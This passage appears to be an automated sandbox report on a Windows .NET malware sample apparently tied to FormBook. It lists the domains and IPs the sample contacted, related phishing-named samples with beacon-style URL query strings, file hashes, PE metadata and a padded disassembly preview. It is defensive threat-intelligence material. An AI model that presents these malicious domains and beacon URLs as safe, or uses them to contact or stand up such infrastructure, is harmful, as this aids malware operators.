                                                        http://www.kaidifeiniroo.netexplorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.trezorsuite.net/ps15/explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.gmgex1.com/ps15/explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.mayson-wedding.com/ps15/www.gmgex1.comexplorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.stdaev.comReferer:explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.plasoi.xyz/ps15/explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.ellipsive.comReferer:explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.seraphmovement.comReferer:explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown

                                                        World Map of Contacted IPs

                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs

                                                        Public IPs

                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        198.185.159.144
                                                        		ext-sq.squarespace.comUnited States
                                                        		53831SQUARESPACEUStrue
                                                        1.32.249.49
                                                        		www.gmgex1.comSingapore
                                                        		64050BCPL-SGBGPNETGlobalASNSGfalse
                                                        172.96.187.60
                                                        		resmierabaru20.shopCanada
                                                        		32475SINGLEHOP-LLCUStrue
                                                        154.86.16.125
                                                        		ss-k2-ss-k2.sspeeddns.comSeychelles
                                                        		40065CNSERVERSUSfalse
                                                        23.227.38.74
                                                        		shops.myshopify.comCanada
                                                        		13335CLOUDFLARENETUSfalse
                                                        35.204.150.5
                                                        		website-rendering.jouwweb.nlUnited States
                                                        		15169GOOGLEUSfalse

                                                        General Information

                                                        Joe Sandbox version:40.0.0 Tourmaline
                                                        Analysis ID:1479545
                                                        Start date and time:2024-07-23 18:27:07 +02:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 12m 9s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Number of analysed new started processes analysed:20
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:1
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Sample name:xU0wdBC6XWRZ6UY.exe
                                                        Detection:MAL
                                                        Classification:mal100.troj.evad.winEXE@112/1@12/6
                                                        EGA Information:
                                                        • Successful, ratio: 100%
                                                        HCA Information:
                                                        • Successful, ratio: 99%
                                                        • Number of executed functions: 192
                                                        • Number of non-executed functions: 303
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .exe
                                                        • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                        Warnings

                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
                                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                        • Report size getting too big, too many NtEnumerateKey calls found.
                                                        • Report size getting too big, too many NtOpenKey calls found.
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                        • VT rate limit hit for: xU0wdBC6XWRZ6UY.exe

                                                        Simulations

                                                        Behavior and APIs

                                                        TimeTypeDescription
                                                        12:28:03API Interceptor22x Sleep call for process: xU0wdBC6XWRZ6UY.exe modified
                                                        12:28:14API Interceptor9091988x Sleep call for process: explorer.exe modified
                                                        14:26:39API Interceptor8129106x Sleep call for process: cmmon32.exe modified

                                                        Joe Sandbox View / Context

                                                        IPs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        198.185.159.144FSW510972H6P0.exeGet hashmaliciousFormBook, DBatLoaderBrowse
                                                        • www.pinkineverything.com/de94/
                                                        http://www.crowdstrike-helpdesk.com/Get hashmaliciousUnknownBrowse
                                                        • www.crowdstrike-helpdesk.com/
                                                        eqqjbbjMlt.elfGet hashmaliciousUnknownBrowse
                                                        • coppedgeconsulting.com/wp-login.php
                                                        gUJak0onLk.elfGet hashmaliciousUnknownBrowse
                                                        • theworldsbest.party/
                                                        Wk8eTHnajw.elfGet hashmaliciousUnknownBrowse
                                                        • abdi.dev/
                                                        H37012.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • www.world-palace.com/h209/?nffDxB=3bAUdU4t95uzUkK5WFuz4AZbTYTbKt5vzd8g1yQ4/8rBs+wX3V9Dad+L+XTtNVooo3wA&8pYtNR=AvKPPvPH0Z4T
                                                        NEW RFQ - Viasat LSDR.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • www.wearelemonpepper.com/e72r/?vXuxe=pOL9EMzjwHc4QyHVW9QI7pfTUn4O8p5HvfFSzBRH6E22323sjFD6qLV7+X+RRSVqyReOs5v/G2u9Vny+UGcnPLQ2pVkVPO7CMgeIjBSUJY+lNiHbmg==&xPN=kZVT_
                                                        PO-2024151-pdf.gz.exeGet hashmaliciousFormBookBrowse
                                                        • www.cakescrushbyruby.com/mu94/?BtT4=canV/74pTpfn3A4bMmkPljt/KQtMkDnHXC3M2VvAloKUcraxhB8pz4ZRDokIm/T2krPvcjJAmw==&_R844b=WN90bd2hY6J
                                                        Salary Increament.exeGet hashmaliciousFormBookBrowse
                                                        • www.ahsanadvisory.com/ty31/?Q4=x0CzTPrVcw2ohiq+0CrnFHLZc1neteKutTnA8f7ue1wUTasMXw9SLgacUZ8mztgOHeRe&jL30v=ndnduhm
                                                        FedEx Invoice_7447707012.exeGet hashmaliciousFormBookBrowse
                                                        • www.rjh-equestrian.com/dk07/?pVOt0l=nb30yf&R2JDXj=bAVg1Oce1ASB2Lxj5WXJ5X4v8itkd1TP4YhWg2oF+1rTYJhvFaPwggMzxPIpjE9FNK1O
                                                        23.227.38.74FSW510972H6P0.exeGet hashmaliciousFormBook, DBatLoaderBrowse
                                                        • www.sewassist.com/de94/
                                                        gUJak0onLk.elfGet hashmaliciousUnknownBrowse
                                                        • shop.bikehireoldghostroad.com/
                                                        S04307164.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • www.wergol.com/hy08/?kBZhq=76ARE7XQpOejeJ4AXgyv9+sF91x02cjLA3TRMrZhHEY9TEByi8vF89DJ/f4r0wEyMxd7&1bY=GtxhAHB
                                                        PURCHASING ORDER.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • www.wergol.com/hy08/?q4k=76ARE7XQpOejeJ4AXgyv9+sF91x02cjLA3TRMrZhHEY9TEByi8vF89DJ/cA73183I0kqTGhIwQ==&3f2pj=9rDXMfLppP84JvX
                                                        Local items and pay document.exeGet hashmaliciousFormBookBrowse
                                                        • www.valerieomage.com/c7rq/?HpUtEh=httm3UUwH6NnwSQhbzeVca8kqE5bj6YPstl+OFvVeu4EU857dyc7w4+qhgXRMO7PTzi/X2HMMMtdNC+wv2+smIEknaszCFizMu+VfqPjgOzMiH+CUg==&G2A=JHe0kn
                                                        PO-2024151-pdf.gz.exeGet hashmaliciousFormBookBrowse
                                                        • www.mysleepfriend.shop/mu94/?BtT4=uYCshvBITvw0P3bJgdUC0me9QEp91dA3I2pOxSxnb4POwxqbJALQI15bQtFkGWJvtzPDe8W2sQ==&_R844b=WN90bd2hY6J
                                                        e-transac- RP062024 Nominal-PPI2452246 20240712NISPIDJA010O0100000503.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • www.valerieomage.com/k2gj/
                                                        09090.exeGet hashmaliciousFormBookBrowse
                                                        • www.k1l1b1.top/h5g5/?zFQHE=XnPbVpjN/8HfOp3rDocXbvIxNNdkm7UU97aTvyFkmvlSq9aR/gBP64yEqoJUhBip7UXXi/rbrVtHq2jCdN+WCRZJC/gyhFCbJVLxADgJjqZ5z2Nfpz2WUMVLMnNvBp4aqfwtpYg=&yF3=b0i4Y00xHtf
                                                        G6uGAyUSVscVBYD.exeGet hashmaliciousFormBookBrowse
                                                        • www.shophansler.com/mc10/?Nvilqt=8p8xbtXX3&mlvt=iGHCYP7HvkNR8WMjrmxz8Zzw3aZSv2pUMsXfD7V+bUPXzKfvmqDg4fbeyax9vb8sFJwW
                                                        4LPk0o7T6C.exeGet hashmaliciousFormBookBrowse
                                                        • www.day2go.net/rn94/?2ds=Ls1ijzPDaFH4ewLYvuUNL8D06n2bzs/1tKV87wXNHEYKjENRXhu0pLj1Kv8q6blj9L7T&CZbDp=fTeDovxhSZ2T70J

                                                        Domains

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        ss-k2-ss-k2.sspeeddns.comyEz94BK14pkJoFb.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • 23.224.212.27
                                                        www.trezorsuite.netyEz94BK14pkJoFb.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • 172.67.214.13
                                                        ext-sq.squarespace.comFSW510972H6P0.exeGet hashmaliciousFormBook, DBatLoaderBrowse
                                                        • 198.185.159.144
                                                        http://www.crowdstrike-helpdesk.com/Get hashmaliciousUnknownBrowse
                                                        • 198.185.159.144
                                                        DHL_497104778908.exeGet hashmaliciousFormBookBrowse
                                                        • 198.185.159.144
                                                        Steel pipes material data sheets Bill of Quantity Valves chemicals KM C654e21011710050.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • 198.185.159.144
                                                        yEz94BK14pkJoFb.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • 198.185.159.144
                                                        H37012.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • 198.185.159.144
                                                        NEW RFQ - Viasat LSDR.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • 198.185.159.144
                                                        PO-2024151-pdf.gz.exeGet hashmaliciousFormBookBrowse
                                                        • 198.185.159.144
                                                        Salary Increament.exeGet hashmaliciousFormBookBrowse
                                                        • 198.185.159.144
                                                        FedEx Invoice_7447707012.exeGet hashmaliciousFormBookBrowse
                                                        • 198.185.159.144
                                                        shops.myshopify.comFSW510972H6P0.exeGet hashmaliciousFormBook, DBatLoaderBrowse
                                                        • 23.227.38.74
                                                        4Ear91jgQ7.exeGet hashmaliciousFormBookBrowse
                                                        • 23.227.38.74
                                                        Transfer copy.lnkGet hashmaliciousFormBookBrowse
                                                        • 23.227.38.74
                                                        https://www.oofos.com/_t/c/A1030004-17E32A02381C380B-99C89FE9?l=AACPKmOIQynUz5zfpcqBmjasGDIqvVGCI6yd%2Bmx5Il204AMrOdUPzLvWJqL8Se24uEXtNUOpKfDyGpz%2BMqaSfQCkW0S2c8323hISpdHSusIt8BFpi66bmqQMJwi%2BbJktfoJ9aXABS5as3916UdxgYPo%2F9djyol1aq0OzViWSgYLUClaAt9n9IvBWOoNqXZwQ7U9lCAovcKcdHG8g0fwRvNd0GCBv%2BIjw2sB8f6g7teIiRvEdQ4bhOIY%2BxLlk%2BqyX9PkVn3%2BhQr6DU5zdlpX9VLAWdUzobacDP62e7yzX4qB4%2BB49w1BwkVMzlNmEuyVsrlc%2Fq%2FRK0V76Maa9joO7t55%2FexbHhmIr4ozdGpbX6J2fcatOXGqWdVx7ogE6iY78UAhKnl9IyPFEgDDs%2BdKq9O3tCpCPUg8ql5zcMR7wZNCfS81RbT4Bbeok7bHnpqVJ9pQo0aGliKwqSjBtj5pEBuIK9rF2H%2FGu1VhP0%2FcQShhqlZDK89TJHfj%2F3ujx%2Fgynt2AL0kQILStB3fuf&c=AAAV2YXmGJa8M%2FJ%2BGlIg6mZhbWUYPJMfdsdcXLFtgQK20MGfietQQg2i%2BeX5HPVtagAH7S0YP7CmhZ6qcbN6uB%2F4sIRsmz5hum4E%2FTYstaqrKncBe5spEyQdqowV33NZHE%2BoYsIcHwFu4KgwVhPuk45id7lCnk%2Fos8JrTR%2Fqp%2BxADats4CqBhZnWgBZ98CxuyGP5%2F8tWhDeK1Nuih9dNg%2F5t5l7fGabH0xLNpUXOb5Hq7kOoIQQP6T6gx%2Fhycv5lUoZCcPL7CUhFoM%2BcJasDwMQtwn46qQ6QJxiTPXgksPGJMh4OM8fqvrKCEntyMeaHi9fKEjOt%2BeIPsU0h7VzM3rWFtx6fcSJtuEMuiKAu3yDvWdy5b2tXYcBOow4MBw9ptKTiBFNRBLS%2B%2FA7qUbCcgF%2Ba5Zv3L%2BVpz9vdksuaWKhgXlgApcwsr2LADPZkvFhzAu3xg2b9HXwt09WRvzpnGet hashmaliciousHTMLPhisherBrowse
                                                        • 23.227.38.74
                                                        S04307164.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • 23.227.38.74
                                                        PURCHASING ORDER.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • 23.227.38.74
                                                        Local items and pay document.exeGet hashmaliciousFormBookBrowse
                                                        • 23.227.38.74
                                                        Payment Form+Inquiry LIST.exeGet hashmaliciousFormBookBrowse
                                                        • 23.227.38.74
                                                        http://exhibitprosper.com/r5K0.aspx?4XVH7cbbbd9tkD1cc3JlHcwglSchg7pcmcpJJhf9scGet hashmaliciousPhisherBrowse
                                                        • 23.227.38.74
                                                        PO-2024151-pdf.gz.exeGet hashmaliciousFormBookBrowse
                                                        • 23.227.38.74

                                                        ASNs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        SINGLEHOP-LLCUSyIRn1ZmsQF.elfGet hashmaliciousUnknownBrowse
                                                        • 107.6.134.207
                                                        zkGOUJOnmc.elfGet hashmaliciousUnknownBrowse
                                                        • 172.96.187.25
                                                        hNX3ktCRra.elfGet hashmaliciousUnknownBrowse
                                                        • 96.127.129.50
                                                        Wk8eTHnajw.elfGet hashmaliciousUnknownBrowse
                                                        • 184.154.120.191
                                                        http://sahinekici.comGet hashmaliciousUnknownBrowse
                                                        • 198.143.164.252
                                                        https://ky.codzika.xyz/pubg/Get hashmaliciousUnknownBrowse
                                                        • 67.212.184.148
                                                        SecuriteInfo.com.FileRepMalware.25505.20211.exeGet hashmaliciousUnknownBrowse
                                                        • 96.127.129.50
                                                        865VzGOmoC.elfGet hashmaliciousMiraiBrowse
                                                        • 107.6.182.135
                                                        yEz94BK14pkJoFb.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • 184.154.46.218
                                                        https://pub-6c03aa29b988412d989d678c4b00d9b5.r2.dev/linkd.htmlGet hashmaliciousHTMLPhisherBrowse
                                                        • 64.46.111.234
                                                        SQUARESPACEUSFSW510972H6P0.exeGet hashmaliciousFormBook, DBatLoaderBrowse
                                                        • 198.185.159.144
                                                        http://www.crowdstrike-helpdesk.com/Get hashmaliciousUnknownBrowse
                                                        • 198.49.23.177
                                                        eqqjbbjMlt.elfGet hashmaliciousUnknownBrowse
                                                        • 198.185.159.145
                                                        zkGOUJOnmc.elfGet hashmaliciousUnknownBrowse
                                                        • 198.185.159.135
                                                        hNX3ktCRra.elfGet hashmaliciousUnknownBrowse
                                                        • 198.185.159.144
                                                        Fzfee1Lgc2.elfGet hashmaliciousUnknownBrowse
                                                        • 198.185.159.145
                                                        gUJak0onLk.elfGet hashmaliciousUnknownBrowse
                                                        • 198.185.159.144
                                                        Yb6ztdvQaB.elfGet hashmaliciousUnknownBrowse
                                                        • 198.185.159.144
                                                        bJrO2iUerN.elfGet hashmaliciousUnknownBrowse
                                                        • 198.185.159.145
                                                        Wk8eTHnajw.elfGet hashmaliciousUnknownBrowse
                                                        • 198.185.159.144
                                                        CNSERVERSUSzkGOUJOnmc.elfGet hashmaliciousUnknownBrowse
                                                        • 172.247.238.14
                                                        gUJak0onLk.elfGet hashmaliciousUnknownBrowse
                                                        • 45.202.243.135
                                                        Wk8eTHnajw.elfGet hashmaliciousUnknownBrowse
                                                        • 154.208.5.117
                                                        SecuriteInfo.com.ELF.GoRAT-B.17415.21821.elfGet hashmaliciousUnknownBrowse
                                                        • 156.251.172.80
                                                        BfQ121ipnz.elfGet hashmaliciousMiraiBrowse
                                                        • 23.224.30.2
                                                        D8J2VuFPRL.rtfGet hashmaliciousFormBookBrowse
                                                        • 154.198.247.80
                                                        Installer.exeGet hashmaliciousGhostRatBrowse
                                                        • 23.224.194.16
                                                        92.249.48.47-skid.mips-2024-07-20T09_04_16.elfGet hashmaliciousMirai, MoobotBrowse
                                                        • 154.91.155.194
                                                        Arrival Notice_AWB 5460943362_PDF.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                        • 172.247.127.147
                                                        yEz94BK14pkJoFb.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • 23.224.212.27
                                                        BCPL-SGBGPNETGlobalASNSG3B4ehVz4C4.elfGet hashmaliciousMiraiBrowse
                                                        • 137.220.195.172
                                                        2024_._._._.__._-_.exeGet hashmaliciousUnknownBrowse
                                                        • 27.124.41.234
                                                        2024_._._._.__._-_.exeGet hashmaliciousUnknownBrowse
                                                        • 27.124.41.234
                                                        http://whatsapp-cc.cyou/Get hashmaliciousUnknownBrowse
                                                        • 143.92.49.50
                                                        https://www.wezvbzqo.com/Get hashmaliciousUnknownBrowse
                                                        • 143.92.52.62
                                                        https://www.jysyxfs.com/Get hashmaliciousUnknownBrowse
                                                        • 143.92.52.62
                                                        https://shzodws.com/Get hashmaliciousUnknownBrowse
                                                        • 143.92.52.62
                                                        https://mj.muxin.trade/Get hashmaliciousUnknownBrowse
                                                        • 134.122.185.21
                                                        Yiwaiwai Build Version.exeGet hashmaliciousUnknownBrowse
                                                        • 27.124.44.209
                                                        Yiwaiwai Build Version.exeGet hashmaliciousUnknownBrowse
                                                        • 27.124.44.209

                                                        JA3 Fingerprints

                                                        No context

                                                        Dropped Files

                                                        No context

                                                        Created / dropped Files

                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\xU0wdBC6XWRZ6UY.exe.log

                                                        Download File
                                                        Process:C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):1415
                                                        Entropy (8bit):5.352427679901606
                                                        Encrypted:false
                                                        SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRaKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPHKMRatHo6hAH4
                                                        MD5:97AD91F1C1F572C945DA12233082171D
                                                        SHA1:D5E33DDAB37E32E416FC40419FB26B3C0563519D
                                                        SHA-256:3F64591E0447E6F5034BC69A8A8D4C7ED36DAC5FE1E408401AE1B98F0D915F7E
                                                        SHA-512:8FAEED342DADC17571F711DDC1BE67C79A51CA5BD56B5DA13E472ED45FC4EC6F1DC704BA92E81E97F5ECFD73F3D88F9B9CD9AE4EADDF993BFF826627215FBBCE
                                                        Malicious:true
                                                        Reputation:moderate, very likely benign file
                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fc

                                                        Static File Info

                                                        General

                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Entropy (8bit):7.786593933855801
                                                        TrID:
                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                        • Win32 Executable (generic) a (10002005/4) 49.75%
                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                        • Windows Screen Saver (13104/52) 0.07%
                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                        File name:xU0wdBC6XWRZ6UY.exe
                                                        File size:803'328 bytes
                                                        MD5:fab057e49c317d42f565ef0efe766557
                                                        SHA1:ebdcbb656a7d0d9ca8c29239a190e1d0265573cd
                                                        SHA256:956c41761587ea08a6eb3fca5b047ec8a3145a2d3ced9d8d3967ab351891bad4
                                                        SHA512:61c4aac488e50417d01a5ae009c927941a45d8729c98baea372ff2a920da9f33fe4c6a222edf178a17b85e74403a1d8a1eac5ed7b262e7934f973b4552e8c737
                                                        SSDEEP:12288:xld0Nhc1y3GJO4HIZAsoBYHy8OQHTV0zTafJbtqemyjWIBJC:jy94HIZAsby7QzV0SRd
                                                        TLSH:3705E08877BBAF55D43963F0E5529A5053F9902A2129F6430FDB28E61FE4FC08242F97
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.................6..........nT... ........@.. ....................................@................................

                                                        File Icon

                                                        Icon Hash:00928e8e8686b000

                                                        Static PE Info

                                                        General

                                                        Entrypoint:0x4c546e
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x66991097 [Thu Jul 18 12:54:47 2024 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                        Entrypoint Preview

                                                        Instruction
                                                        jmp dword ptr [00402000h]
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
